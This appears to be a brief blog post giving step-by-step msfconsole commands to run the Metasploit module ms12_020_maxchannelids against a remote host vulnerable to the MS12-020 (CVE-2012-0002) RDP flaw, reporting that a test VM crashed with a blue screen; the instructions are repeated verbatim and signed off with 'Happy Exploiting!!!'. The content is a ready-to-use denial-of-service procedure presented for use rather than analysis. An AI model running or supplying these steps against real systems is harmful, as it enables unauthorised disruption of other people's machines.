How to exploit MS12-020 (CVE-2012-0002) RDP vulnerability using Metasploit?
CVE-2012-0002
is an internally reported vulnerability in Microsoft's Remote Desktop
Application. Patch for this vulnerability was released on March 13, 2012
as MS12-020. This vulnerability can cause a full system compromise.
Failed attempts to exploit this vulnerability can cause a DoS for RDP.
Metasploit has working exploit for DoS for this vulnerability. The remote system should be running terminal services service for this exploit to work. Here's how it goes:
1. Start msfconsole
2. Give the command - use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3. Then set the IP address of the remote system giving the command - set RHOST <IP>
4. Then give the command - 'run' to execute the exploit on the remote system
I tried it on a local VM and the VM showed a BSOD.
Happy Exploiting!!!
Metasploit has working exploit for DoS for this vulnerability. The remote system should be running terminal services service for this exploit to work. Here's how it goes:
1. Start msfconsole
2. Give the command - use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3. Then set the IP address of the remote system giving the command - set RHOST <IP>
4. Then give the command - 'run' to execute the exploit on the remote system
I tried it on a local VM and the VM showed a BSOD.
Happy Exploiting!!!
Комментарии
Отправить комментарий